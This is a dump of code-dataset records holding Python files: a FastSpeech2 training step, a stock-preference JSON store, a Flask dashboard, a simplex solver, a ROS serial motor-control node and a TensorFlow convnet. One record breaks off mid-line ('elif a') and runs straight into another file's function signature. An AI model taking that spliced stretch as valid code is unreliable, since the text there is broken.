argparse.ArgumentParser()\n parser.add_argument('--cfg_file', type=str, required=True,\n help='Path to the config file for a specific experiment.')\n args = parser.parse_args()\n\n # Get the default config & merge from cfg_file\n cfg = get_cfg_defaults()\n cfg.merge_from_file(args.cfg_file)\n\n # Make sure checkpoint dir exists\n args.checkpoint_dir = cfg['EVAL']['CHECKPOINT_DIR']\n assert os.path.isdir(args.checkpoint_dir), \\\n \"Please make sure the specified checkpoint dir and eval epoch exist.\"\n\n # Call main\n main(args, cfg)","repo_name":"cattidea/VinVL-Paddle","sub_path":"tools/eval_retrieval.py","file_name":"eval_retrieval.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5207886397","text":"'''\nExample case 2. In this example 2 as 20 is greater than 10.\nExample case 3. 
In this example 3 as 10 is equal to 10.\n\n'''\n\ndef relationshipCheck(a,b):\n\tif a>b:\n\t\treturn '>'\n\telif a NamedTuple(\n 'train_outputs',\n [\n ('data_ref_paths', List)\n ]):\n import re\n import json\n import os\n from pathlib import Path\n from typing import Tuple\n\n import torch\n import torch.multiprocessing\n import torch.nn as nn\n from fastspeech2.dataset import Dataset\n from fastspeech2.trainers.trainer import Trainer\n from fastspeech2.utils import parse_kwargs, get_rest_path_from\n from pytorch_sound.models import build_model\n from torch.utils.data import DataLoader\n\n \n from fs2_env import get_paths\n paths = get_paths(base_path=data_base_path, current_data_path=current_data_path)\n\n\n def main(train_path: str, preprocessed_paths: List,\n save_dir: str, save_prefix: str,\n model_name: str, pretrained_path: str = None, num_workers: int = 16,\n batch_size: int = 16,\n pitch_feature: str = 'phoneme', energy_feature: str = 'phoneme',\n pitch_min: float = 0., energy_min: float = 0.,\n lr: float = 2e-4, weight_decay: float = 0.0001, betas=(0.9, 0.98),\n train_epoch: int = 0, group_size: int = 4,\n number_of_model_save_per_epoch: int = 0, log_interval: int = 50, grad_clip: float = 0.0, grad_norm: float = 5.0,\n milestones: Tuple[int] = None, gamma: float = 0.2, sr: int = 22050, seed: int = 2021,\n is_reference: bool = False):\n # create model\n model = build_model(model_name).cuda()\n\n # multi-gpu\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n\n # create optimizers\n optimizer = torch.optim.AdamW(model.parameters(), lr=lr, betas=betas, weight_decay=weight_decay)\n if milestones:\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones, gamma=gamma)\n else:\n scheduler = None\n\n # save_dir = current_data_path / save_dir\n\n dataset = Dataset(train_path, preprocessed_paths, pitch_min=pitch_min, energy_min=energy_min,\n text_cleaners=['english_cleaners'],\n batch_size=batch_size, sort=True, drop_last=True, is_reference=is_reference)\n\n print(f'INFO: length of data: {len(dataset)}')\n train_max_step = len(dataset) * train_epoch\n save_interval = len(dataset) // number_of_model_save_per_epoch\n\n train_loader = DataLoader(\n dataset,\n batch_size=batch_size * group_size,\n shuffle=True,\n collate_fn=dataset.collate_fn,\n num_workers=num_workers\n )\n\n # train\n Trainer(\n model, optimizer,\n train_loader, None,\n max_step=train_max_step, save_interval=save_interval,\n log_interval=log_interval, pitch_feature=pitch_feature, energy_feature=energy_feature,\n save_dir=save_dir, save_prefix=save_prefix, grad_clip=grad_clip, grad_norm=grad_norm,\n pretrained_path=pretrained_path, sr=sr,\n scheduler=scheduler, seed=seed, is_reference=is_reference\n ).run()\n\n\n config = {\n \"fs2_base_path\": \"fs2-data\",\n \"train_path\": \"train.txt\",\n \"eval_path\": \"val.txt\",\n \"preprocessed_path\": \"preprocessed\",\n # \"save_dir\": \"./saved-models\",\n \"save_prefix\": \"fastspeech2_base\",\n \"model_name\": \"fast_speech2_vctk\",\n\n \"log_interval\": 100,\n \"pitch_min\": -1.9287127187455897,\n \"energy_min\": -1.375638484954834,\n # \"batch_size\": 8,\n # \"save_interval\": 100,\n \"num_workers\": 4,\n # \"max_step\": 201,\n\n \"metadata_path\": \"./metadata\",\n \"global_optimal_checkpoint_stat_path\": \"./global-optimal-checkpoint-status.json\",\n \"data_refs_filename\": \"data_refs.json\",\n\n \"fs2_data_base_path\": \"./data\",\n \"data_intermediate_regex\": \"\\d{8}-\\d{6}-intermediate\"\n }\n\n torch.backends.cudnn.benchmark = True\n 
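    # Editor's note: cudnn.benchmark (set above) lets cuDNN profile and cache the
    # fastest convolution kernels for the input shapes it observes, which usually
    # speeds up training when shapes are static across batches. The 'file_system'
    # sharing strategy set on the next line stores tensors shared between
    # DataLoader workers as files instead of file descriptors -- the common
    # workaround for "too many open files" errors when num_workers is large.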
torch.multiprocessing.set_sharing_strategy('file_system')\n\n pretrained_checkpoint_path = None\n\n current_data_path_instance = Path(paths['current_data'])\n current_preprocessed_finished_path = current_data_path_instance.parent / '-'.join(current_data_path_instance.stem.split('-')[:-1]) / config['preprocessed_path']\n\n preprocessed_paths = [paths['preprocessed']]\n data_refs = [str(current_preprocessed_finished_path)]\n\n if Path(paths['global_optimal_checkpoint_status']).exists():\n with open(paths['global_optimal_checkpoint_status'], 'r') as f:\n global_optimal_checkpoint = json.load(f)\n \n previous_checkpoint_base_path = global_optimal_checkpoint['base_path']\n pretrained_checkpoint_path = os.path.join(previous_checkpoint_base_path, global_optimal_checkpoint['deployed_checkpoint']['path'])\n\n previous_checkpoint_paths = get_paths(base_path=data_base_path, current_data_path=previous_checkpoint_base_path)\n with open(previous_checkpoint_paths['train_eval_data_refs'], 'r') as f:\n previous_data_refs = json.load(f)\n data_refs.extend(previous_data_refs)\n \n search_path_pattern = paths['data'] + '/*/' + config[\"preprocessed_path\"]\n search_path_filter_regex = re.compile(config[\"data_intermediate_regex\"])\n rest_preprocessed_paths = get_rest_path_from(search_path_pattern=search_path_pattern,\n exclude_paths=previous_data_refs + [current_data_path],\n search_path_filter_regex=search_path_filter_regex)\n\n if rest_preprocessed_paths:\n print(f'INFO: find {len(rest_preprocessed_paths)} rest of preprocessed path(s)')\n print(f'INFO: {rest_preprocessed_paths}')\n print(f'INFO: set these to additional load path')\n\n preprocessed_paths.extend(rest_preprocessed_paths)\n data_refs.extend(rest_preprocessed_paths)\n\n main(pretrained_path=pretrained_checkpoint_path, train_epoch=train_epoch, batch_size=batch_size, \n number_of_model_save_per_epoch=number_of_model_save_per_epoch,\n preprocessed_paths=preprocessed_paths,\n save_dir=paths['train_output'],\n **parse_kwargs(main, **config))\n\n with open(paths['train_eval_data_refs'], 'w') as f:\n json.dump(data_refs, f, indent=2)\n\n from collections import namedtuple\n train_outputs = namedtuple(\n 'train_outputs',\n ['data_ref_paths']\n )\n\n return train_outputs(preprocessed_paths)\n\n\nif __name__ == '__main__':\n res = train('/local-storage', '/local-storage/fs2-data/data/20211017-191719-intermediate', train_epoch=1, batch_size=8, number_of_model_save_per_epoch=1)\n print(res)\n","repo_name":"fibremint/fastspeech2-ml-pipeline","sub_path":"components/ops/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25602059520","text":"#! 
/usr/bin/env python3\n\n# __author__ = \"Praneesh Kataru\"\n# __credits__ = []\n# __version__ = \"0.1.1\"\n# __maintainer__ = \"Praneesh Kataru\"\n# __email__ = \"pranuvitmsse05@gmail.com\"\n# __status__ = \"Prototype\"\n\nimport json\nfrom os import path\n\n\nclass UserStockPrefDAL:\n    db_exception = None\n    user_all_prefs = None\n\n    def __init__(self):\n        self.user_stock_pref_db_file = path.join(path.dirname(path.abspath(__file__)), 'database/UserStockPref.json')\n        try:\n            with open(self.user_stock_pref_db_file,'r') as json_data:\n                self.user_all_prefs = json.load(json_data)\n        except Exception as general_exception:\n            self.db_exception = general_exception\n\n    def get_all_user_preferences(self):\n        \"\"\" Returns the stock interests of all users \"\"\"\n        return self.db_exception, self.user_all_prefs\n\n    def get_all_stock_preferences(self):\n        \"\"\"Gets all the stocks that users are interested in.\"\"\"\n        ret_all_stock_keys = set()\n        available_user_prefs = self.user_all_prefs\n        for user_preference in available_user_prefs:\n            user_pref_stocks = user_preference[\"userStocks\"]\n            for stockItem in user_pref_stocks:\n                ret_all_stock_keys.add(stockItem['key'])\n        return self.db_exception, ret_all_stock_keys\n\n    def get_stock_preferences_by_user_id(self, user_id):\n        \"\"\" Returns the stock interests of a user \"\"\"\n        ret_user_pref = None\n        ret_select_exception = None\n        available_preferences = self.user_all_prefs\n        for user_preference in available_preferences:\n            if user_id == user_preference['userID']:\n                ret_user_pref = user_preference\n                break\n        return ret_select_exception, ret_user_pref\n\n    def get_users_by_stock_preference(self, stock_key):\n        \"\"\"Returns the list of users who are interested in a particular stock item\"\"\"\n        ret_stock_pref_user_list = list()\n        ret_select_exception = None\n        available_preferences = self.user_all_prefs\n        for user_preference in available_preferences:\n            user_preferred_stocks = user_preference['userStocks']\n            for stock in user_preferred_stocks:\n                if stock['key'] == stock_key:\n                    ret_stock_pref_user_list.append(user_preference['userID'])\n                    break\n        return ret_select_exception, ret_stock_pref_user_list\n\n    def update_stock_preference_for_user(self, user_id, stock_key):\n        \"\"\"Updates the stock preference of a user\"\"\"\n        ret_update_exception = None\n        ret_update_status = False\n        user_all_current_prefs = self.user_all_prefs\n        for user_preference in user_all_current_prefs:\n            if user_id == user_preference['userID']:\n                # Create a new stock key object\n                user_new_stock = dict()\n                user_new_stock['key'] = stock_key\n\n                # Update the existing stock key object - check for existence of an element before updating\n                user_preference['userStocks'].append(user_new_stock)\n                break\n        print(user_all_current_prefs)\n\n        # Now open the file in write mode and dump into it.\n        try:\n            stock_pref_json_file = open(self.user_stock_pref_db_file, \"w+\")\n            stock_pref_json_file.write(json.dumps(user_all_current_prefs))\n            ret_update_status = True\n            stock_pref_json_file.close()\n        except Exception as general_exception:\n            ret_update_exception = general_exception\n        finally:\n            return ret_update_exception, ret_update_status\n\n\n","repo_name":"Praneesh/quickstocks","sub_path":"qs_backend/qs_backend/dal/user_stock_pref_dal.py","file_name":"user_stock_pref_dal.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"8734541045","text":"from app import app,mysql,save_images,save_music\nfrom flask import 
Flask,render_template,request,redirect,flash,session,url_for,current_app,jsonify\nfrom flask_fontawesome import fontawesome_css\nfrom playsound import playsound\nimport os\n\ndef artists():\n    artists = []\n    f = open('app/artists.txt','r')\n    for line in f:\n        artists.append(line.split(\",\"))\n    return artists\n\n\n\n\n\n\n\"\"\"\n    Music dashboard\n\n\"\"\"\n@app.route('/music',methods=[\"GET\",\"POST\"])\ndef dashboard():\n    genre = [['pop','bg.jpg'],['jazz','jazz.jpg'],['devotional','dev.jpg'],['hip hop','hiphop.jpg'],['workout',\"workout.jpg\"],['sad','sad1.jpg'],['happy','happy.jpg'],[\"Melody\",\"melody.jpg\"]]\n    artist = artists()\n    return render_template(\"user_dashboard/music_dash.html\",genres=genre, artists = artist)\n\n\n\n\n\"\"\"\n    Playlist According to Genres\n\"\"\"\n@app.route('/genre',methods=[\"GET\",\"POST\"])\ndef genre():\n    songs = ['mood','sketches']\n    return jsonify({'data': render_template(\"user_dashboard/genre.html\",songs=songs)})\n\n\n\n\n\"\"\"\n    Playlist and Albums of Artists\n\"\"\"\n@app.route('/music/artist',methods=[\"GET\",\"POST\"])\ndef artist():\n    music = []\n    music.append(os.path.join(\"mood.mp3\"))\n    music.append(os.path.join(\"sketches.mp3\"))\n    return render_template(\"user_dashboard/music.html\", songs=music)","repo_name":"mitra-31/dbmsproject_git","sub_path":"app/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19223714444","text":"\nclass Simplex:\n    def __init__(self):\n        self.A = []  # variable for the matrix\n        self.m, self.n = 2, 2  # m - number of machines, n - number of part types\n        self.bj = None\n        self.x_value = {}\n        self.k = 0\n        self.A.append([])\n        self.A[0].append(\"S\\X\")\n\n        print(self.x_value)\n        self.C = list()\n\n        self.Z = [\"Z\"]\n        self.input()\n        for i in range(self.m):\n            for j in range(self.n):\n                self.A[0].append('X' + str(i) + str(j))\n                string = 'X' + str(i) + str(j)\n\n                self.x_value[string] = 0\n\n        for i in self.C :\n            print(i)\n        self.preprocessCon(self.C)\n        self.Z.append(0)\n        self.A.append(self.Z)\n        self.A[0].append(\"B\")\n        for i in self.A:\n            string = \"\"\n            for j in i:\n                string = string + \"\\t\\t\" + str(j)\n            print(string)\n        self.simplex()\n        for i in range(1, len(self.A) - 1):\n            self.x_value[self.A[i][0]] = self.A[i][-1]\n\n        self.x = list()\n        for i in range(self.m):\n            for j in range(self.n):\n                string = 'X' + str(i) + str(j)\n                self.x.append(self.x_value[string])\n\n        self.goint()\n        for i in range(self.m):\n            for j in range(self.n):\n                string = 'X' + str(i) + str(j)\n                print(string + \" = \", self.x[i * self.n + j])\n        res = 0\n        for i in range(1, len(self.Z) - 1):\n            res = res + self.Z[i] * self.x[i - 1]\n\n        print(\"Z = \", -1 * res)\n\n    # optimality check for the dual table\n    def optimum2(self):\n        for i in range(1, len(self.A) - 1):\n            if self.A[i][-1] <= 0:\n                print(\"Table is not optimal!!!!\")\n                return True\n\n        return False\n\n    # find the maximum row for the dual table\n    def maximum_s(self):\n        maximum = 1\n        for i in range(2, len(self.A) - 1):\n            if self.A[maximum][-1] >= 0:\n                maximum = i\n                continue\n            if self.A[maximum][-1] > self.A[i][-1]:\n                maximum = i\n        return maximum\n\n    \"\"\"find the minimum column for the dual table\n    maximum -> obtained from self.maximum_s()\"\"\"\n\n    def minimum_r(self, maximum):\n        lst = list()\n        for i in range(1, len(self.A[0]) - 1):\n            if self.A[maximum][i] >= 0:\n                lst.append(99999)\n            else:\n                lst.append(self.A[-1][i] / self.A[maximum][i])\n        
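        # Editor's note: this loop and the scan below form the dual-simplex
        # ratio test. For every column whose entry in the pivot row is negative,
        # the candidate ratio is z-row entry / pivot-row entry; 99999 acts as a
        # sentinel "infinity" so columns with non-negative entries can never win
        # the argmin that follows.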
        minimum = 0\n        for i in range(1, len(lst)):\n            if lst[minimum] > lst[i]:\n                minimum = i\n\n        return minimum + 1\n\n    # Build the simplex table\n    def preprocessCon(self, con):\n        for cont in con:\n            sign = cont[-2]\n            if sign == \"<=\":\n                self.A.append([])\n                self.A[self.k + 1].append(\"S\" + str(self.k))\n                for i in range(len(cont) - 2):\n                    self.A[self.k + 1].append(cont[i])\n                self.A[self.k + 1].append(cont[-1])\n                self.k += 1\n            if sign == \"=\":\n                self.A.append([])\n                self.A[self.k + 1].append(\"0\")\n                for i in range(len(cont) - 2):\n                    self.A[self.k + 1].append(cont[i])\n                self.A[self.k + 1].append(cont[-1])\n                self.k += 1\n            if sign == \">=\":\n                for i in range(len(cont) - 2):\n                    cont[i] = -1 * cont[i]\n                cont[-1] = cont[-1] * -1\n                self.A.append([])\n                self.A[self.k + 1].append(\"S\" + str(self.k))\n                for i in range(len(cont) - 2):\n                    self.A[self.k + 1].append(cont[i])\n                self.A[self.k + 1].append(cont[-1])\n                self.k += 1\n\n    # Find the pivot column\n    def searchMin(self):\n        Min = 1\n        for i in range(2, len(self.A[-1]) - 1):\n            if self.A[-1][i] > 0:\n                if self.A[-1][i] > self.A[-1][Min]:\n                    Min = i\n        return Min\n\n    # Find the pivot row\n    def searchMin2(self, Min):\n        lst = list()\n        for i in range(1, len(self.A) - 1):\n            if self.A[i][Min] != 0:\n                lst.append(self.A[i][-1] / self.A[i][Min])\n            else:\n                lst.append(-1)\n        maximum = 0\n        for i in range(1, len(lst)):\n            if lst[i] >= 0 and lst[i] <= lst[maximum]:\n                maximum = i\n        return maximum + 1\n\n    # Swap the row and column header names\n    def swap(self, Min1, Min2):\n        self.A[0][Min1], self.A[Min2][0] = self.A[Min2][0], self.A[0][Min1]\n\n    # If a variable is zero we can ignore it, which means this column can be removed.\n    def del_null(self, Min):\n        if self.A[0][Min] == \"0\":\n            for i in range(len(self.A)):\n                del self.A[i][Min]\n\n    # Check the solution for optimality.\n    def optimum(self):\n        for i in range(1, len(self.A[-1]) - 1):\n            if self.A[-1][i] >= 0:\n                print(\"Table is not optimal\")\n                return True\n        print(\"Table is optimal \")\n        return False\n\n    # Recompute the table relative to the pivot element\n    def calculate(self, max_r, min_s):\n        new_a = []\n        k = 0\n        print(\"Pivot element: \", min_s, max_r)\n        for i in range(1, len(self.A) - 1):\n            new_a.append([])\n            new_a[k].append(self.A[i][0])\n            for j in range(1, len(self.A[0]) - 1):\n                if j == max_r:\n                    if i == min_s:\n                        new_a[k].append(1 / self.A[i][j])\n                    else:\n                        new_a[k].append(-1 * self.A[i][j] / self.A[min_s][max_r])\n                else:\n                    if i == min_s:\n                        new_a[k].append(self.A[i][j] / self.A[min_s][max_r])\n                    else:\n                        new_a[k].append((self.A[i][j] * self.A[min_s][max_r] - (self.A[i][max_r] * self.A[min_s][j])) /\n                                        self.A[min_s][max_r])\n\n            k += 1\n        new_a.append([])\n        new_a[k].append(\"Z\")\n        for i in range(1, len(self.A[0]) - 1):\n            if i == max_r:\n                new_a[k].append(-1 * self.A[-1][i] / self.A[min_s][max_r])\n            else:\n                new_a[k].append(\n                    (self.A[-1][i] * self.A[min_s][max_r] - self.A[-1][max_r] * self.A[min_s][i]) / self.A[min_s][\n                        max_r])\n\n            if i == min_s:\n                new_a[i - 1].append(self.A[i][-1] / self.A[min_s][max_r])\n            else:\n                new_a[i - 1].append(\n                    (self.A[i][-1] * self.A[min_s][max_r] - self.A[min_s][-1] * self.A[i][max_r]) / self.A[min_s][\n                        max_r])\n\n        new_a.insert(0, [])\n        k += 1\n        for i in self.A[0]:\n            new_a[0].append(i)\n\n        z = (self.A[-1][-1] * self.A[min_s][max_r] - self.A[-1][max_r] * self.A[min_s][-1]) / self.A[min_s][max_r]\n        new_a[-1].append(z)\n        for i in range(len(self.A)):\n            self.A[i] = new_a[i]\n\n    # Print the table\n    def print_table(self):\n        string = \"\"\n        for i in self.A[0]:\n            string = string + \"\\t\\t\\t\" + 
i\n        print(string)\n        for i in range(1, len(self.A)):\n            string = \"\\t\\t\\t\" + self.A[i][0]\n            for j in range(1, len(self.A[0])):\n                string = string + \"\\t\\t\\t\" + str(round(self.A[i][j], 2))\n            print(string)\n\n\n\n    \"\"\"Method that runs the simplex-method computation for table A\n    s/x    x1    x2    x3    x4   ...   B\n    s1     c1    c2    c3    c4   ...   b1 \n    s2     c5    c6    ...         b2\n    A = s3 ...    b3\n    s4    ...          b4\n    ...    ...\n    Z     z1    z2    z3    z4    ...   Zmax(min)\n    \"\"\"\n\n    def simplex(self):\n        k = 1\n        while self.optimum2():\n            print(\"ITER \", k)\n            max_s = self.maximum_s()\n            print(\"MAX_S: \", max_s)\n            min_r = self.minimum_r(max_s)\n            print(\"MIN_R\", min_r)\n            self.swap(min_r, max_s)\n            self.calculate(min_r, max_s)\n            self.print_table()\n            k += 1\n\n    # Input function\n    def input(self):\n        print(\"\\n\".join((\n            \"*******************************************************************************\",\n            \"Problem\",\n            \"There are m machines, on which parts of n types are processed.\",\n            \"The i-th machine is allotted working time ai\",\n            \"According to the plan, bj parts of the j-th type must be produced.\",\n            \"Processing the j-th part on the i-th machine involves setup operations\",\n            \"requiring time tij; the processing itself takes time aij, and its cost equals cij\",\n            \"The task is to draw up a cost-optimal machine loading plan\",\n            \"********************************************************************************\"\n        )))\n        m = int(input(\"Enter m: \"))\n        n = int(input(\"Enter n: \"))\n        ai = []\n        bj = []\n        tij = []\n        aij = []\n        cij = []\n        for i in range(m):\n            string = \"Enter a\" + str((i + 1)) + \": \"\n            ai.append(float(input(string)))\n\n        for j in range(n):\n            string = \"Enter b\" + str((j + 1)) + \": \"\n            bj.append(float(input(string)))\n\n        for i in range(m):\n            lst1 = []\n            lst2 = []\n            lst3 = []\n            for j in range(n):\n                string1 = \"Enter t\" + str((i + 1)) + str((j + 1)) + \": \"\n                string2 = \"Enter a\" + str((i + 1)) + str((j + 1)) + \": \"\n                string3 = \"Enter c\" + str((i + 1)) + str((j + 1)) + \": \"\n                lst1.append(float(input(string1)))\n                lst2.append(float(input(string2)))\n                lst3.append(float(input(string3)))\n\n            tij.append(lst1)\n            aij.append(lst2)\n            cij.append(lst3)\n        string = \"Z = \"\n        for ci in range(m):\n            for c in range(n):\n                string = string + \" \" + str(cij[ci][c]) + \"x\" + str(ci) + str(c)\n        string = string + \"-> min\"\n        print(string)\n        for i in range(m):\n            for j in range(n):\n                self.Z.append(-1 * cij[i][j])\n        full = n * m\n        for i in range(n):\n            lst1 = []\n            for z in range(i * m):\n                lst1.append(0)\n            for j in range(m):\n                lst1.append(1)\n            for z in range(full - (i + 1) * m):\n                lst1.append(0)\n\n            lst1.append('>=')\n            lst1.append(bj[i])\n            self.C.append(lst1)\n\n        for i in range(m):\n            lst1 = []\n            for j in range(n):\n                lst1.append(tij[j][i] + aij[j][i])\n                for z in range(m - 1):\n                    lst1.append(0)\n            if i == 1:\n                lst1.pop()\n                lst1.insert(0, 0)\n            lst1.append('<=')\n            lst1.append(ai[i])\n            self.C.append(lst1)\n\n        self.m, self.n = m, n\n        self.bj = bj\n\n    # Rounding function\n    def goint(self):\n        for i in range(self.n):\n            z = self.bj[i]\n            for j in range(self.m):\n                self.x[i * self.m + j] = round(self.x[i * self.m + j])\n                z = z - self.x[i * self.m + j]\n            if z > 0:\n                max = self.x[i * self.m]\n                jmin = 0\n                for j in range(1, self.m):\n                    if max > self.x[i * self.m + j]:\n                        jmin = j\n                self.x[i * self.m + jmin] = self.x[i * self.m + jmin] - z\n            else:\n                max = self.x[i * self.m]\n                jmin = 0\n                for j in range(1, self.m):\n                    if max < self.x[i * self.m + j]:\n                        max = self.x[i * self.m + j]\n                        jmin = j\n                self.x[i * self.m + jmin] = self.x[i * self.m + jmin] + 
z\n\n\nSimplex()\n","repo_name":"fakecharge/NikulinLB","sub_path":"simplex_method.py","file_name":"simplex_method.py","file_ext":"py","file_size_in_byte":13025,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8307054349","text":"n, m = map(int, input().split())\nans = []\ndef back():\n    if m == len(ans):\n        print(*ans)\n        return\n    for i in range(1, n+1):\n        ans.append(i)\n        back()\n        ans.pop()\n\nback()","repo_name":"ssatudy/JiEun_AlgoStudy","sub_path":"0921.nm/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12108634984","text":"#!/usr/bin/env python\nimport json\nimport serial\nimport rospy\nfrom robot.srv import encoders, encodersResponse\nfrom threading import Thread\nfrom geometry_msgs.msg import Twist, Vector3\nimport sys\nimport time\nfrom std_msgs.msg import String\n\n \n\n#position thread\nclass getPosThread(Thread):\n    def __init__(self, serial):\n        Thread.__init__(self)\n        self.__serial = serial\n        return\n    def run(self):\n        \n        rospy.Service('encoders', encoders, self.handle_encoders)\n        rospy.spin()\n\n    def getPosition(self):\n        sr =\"enc=(-1;-1)\"\n        if (not self.__serial.busy()):\n            self.__serial.setBusy() #---------\n            #print(\"encoders: send => \")\n            getit = True\n            #send the command\n            self.__serial.write(b\"M404 \\n\")\n            \n            #retrieve the encoder values\n            i = 0\n            while getit:\n                \n                by = self.__serial.readline()\n                sr=by.decode('utf-8')\n                getit = not \"enc=\"in sr\n                i+=1\n                if i >2:\n                    getit = False\n                    sr = \"enc=(-1;-1)\"\n            #print(\"encoders: done <= \")\n            self.__serial.setUnbusy()#---------\n        \n        return sr\n\n    def handle_encoders(self, req):\n        #return the position to the client\n        strData = self.getPosition()\n        data = strData.replace('enc=(', '').replace(')', '').split(';')\n        \n        return encodersResponse(float(data[0]),float(data[1])) \n\n\nclass setPosConsignThread(Thread):\n    def __init__(self, serial):\n        Thread.__init__(self)\n        self.__serial = serial\n\n    def run(self):\n        rospy.Subscriber(\"robot_consign\", Twist, self.getConsign)\n        rospy.spin()\n\n    def getConsign(self, cons):\n        gcode = \"\"\n        if cons.angular.z == 0:\n            gcode = \"G26 X{0:.2f} Y{1:.2f} \\n\".format(cons.linear.x, cons.linear.y)\n        elif cons.angular.z == 1:\n            gcode = \"G11 I{0:.2f} J{1:.2f} \\n\".format(cons.linear.x, cons.linear.y)\n        elif cons.angular.z == 2:\n            gcode = \"G10 I{0:.2f} J{1:.2f} \\n\".format(cons.linear.x, cons.angular.x)\n        elif cons.angular.z == 3:\n            gcode = \"G13 I{0:.2f} J{1:.2f} \\n\".format(cons.linear.x, cons.angular.x)\n        self.__serial.sendGcode(gcode) \n        \n\n\nclass requestMotorThread(Thread):\n    def __init__(self, serial):\n        Thread.__init__(self)\n        self.__serial = serial\n\n    def run(self):\n        \n        rospy.Subscriber(\"server_req\", String, self.sendReq)\n        rospy.spin()\n\n    def sendReq(self, req):\n        \n        #convert to an object\n        try:\n            req = json.loads(req.data)\n            \n            \n            gcode = \"\"\n            if(req[\"type\"] == \"motor_request\"):\n                if(req[\"request\"] == \"set_pid_left\"):\n                    gcode = \"M301 P{0:.3f} I{1:.3f} D{2:.3f} \\n\".format(req[\"p\"], req[\"i\"], req[\"d\"])\n                elif(req[\"request\"] == \"set_pid_right\"):\n                    gcode = \"M302 P{0:.3f} I{1:.3f} D{2:.3f} \\n\".format(req[\"p\"], req[\"i\"], req[\"d\"])\n                elif(req[\"request\"] == \"set_power_k\"):\n                    gcode = \"M323 I{0:.3f} J{1:.3f} \\n\".format(req[\"l\"], req[\"r\"])\n                elif(req[\"request\"] == \"set_measure_k\"):\n                    gcode = \"M324 I{0:.3f} J{1:.3f} \\n\".format(req[\"l\"], 
req[\"r\"])\n self.__serial.sendGcode(\"M400 \\n\") \n self.__serial.sendGcode(gcode) \n #enregistrement\n \n except Exception:\n pass\n\n\n\nclass MotSerial(serial.Serial):\n def __init__(self, serialName):\n serial.Serial.__init__(self, serialName, 115200, timeout=0)\n self.__serialBusy = False\n def busy(self):\n return self.__serialBusy\n def setUnbusy(self):\n self.__serialBusy = False\n def setBusy(self):\n self.__serialBusy = True\n def sendGcode(self, gcode):\n sended = False\n while not sended:\n if (not self.busy()):\n self.setBusy() #---------\n time.sleep(0.01)\n self.write(gcode.encode(\"utf8\"))\n print(gcode)\n sended = True\n self.setUnbusy()#---------\n def sendWithResponse(self, gcode):\n if (not self.busy()):\n self.setBusy() #---------\n getit = True\n #envoie de la commande\n self.write(gcode.encode(\"utf8\"))\n \n #reccuperation de la valeur des encodeurs\n i = 0\n while getit:\n \n by = self.readline()\n sr=by.decode('utf-8')\n getit = not \"enc=\"in sr #a finir\n i+=1\n if i >2:\n getit = False\n sr = \"response_failed\"\n #print(\"encodeurs: fin <= \")\n self.setUnbusy()#---------\n \n return sr\n pass\n\nserialName = rospy.get_param(\"motor_controller_port\", \"/dev/ttyACM0\")\n\nprint(serial.__file__)\nser = MotSerial(serialName)\n\n#execution server position\nrospy.init_node('serialCon')\n\nposServer = getPosThread(ser)\nposServer.start()\n\nconsServer = setPosConsignThread(ser)\nconsServer.start()\n#server motor request\nreqServer = requestMotorThread(ser)\nreqServer.start()\n\n\"\"\"print(\"'out' to exit\")\nwhile 1:\n strIn = input('cmd: ')\n #print(strIn)\"\"\"\n\n","repo_name":"momo2555/robot","sub_path":"scripts/serialCon.py","file_name":"serialCon.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"38516819552","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport os\nimport tensorflow as tf\nimport numpy as np\n\n\ndef convnet(X, conv_layer1_W, conv_layer2_W, conv_layer1_b, conv_layer2_b, dense_layer_W, dense_layer_b):\n\n scores = None\n conv_layer1_out = tf.nn.conv2d(X, conv_layer1_W, strides=[1,1,1,1], padding=\"SAME\")\n conv_layer1_out += conv_layer1_b\n relu_layer1_out = tf.nn.relu(conv_layer1_out)\n \n conv_layer2_out = tf.nn.conv2d(conv_layer1_out, conv_layer2_W, strides=[1,1,1,1], padding=\"SAME\")\n conv_layer2_out += conv_layer2_b\n relu_layer2_out = tf.nn.relu(conv_layer2_out)\n \n #flatten the output from ReLU layer\n N = tf.shape(relu_layer2_out)[0]\n relu_layer2_out = tf.reshape(relu_layer2_out, (N, -1))\n output = tf.matmul(relu_layer2_out, dense_layer_W)\n output += dense_layer_b\n \n return output\n\n\nX = tf.placeholder(tf.float32)\nconv_layer1_W = tf.random.normal((5, 5, 3, 6))\nconv_layer2_W = tf.random.normal((2, 2, 6, 9))\nconv_layer1_b = tf.random.normal((6,))\nconv_layer2_b = tf.random.normal((9,))\ndense_layer_W = tf.random.normal((32 * 32 * 9, 10))\ndense_layer_b = tf.random.normal((10,))\nscores = convnet(X, conv_layer1_W, conv_layer2_W, conv_layer1_b, conv_layer2_b, dense_layer_W, dense_layer_b)\n\nX_np = np.random.rand(10, 32, 32, 3)\n \nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n scores_np = sess.run(scores, feed_dict={X: X_np})\n print(scores_np)\n\n\n","repo_name":"tarun0409/smai-assignment-6","sub_path":"src/q-3-1.py","file_name":"q-3-1.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} 
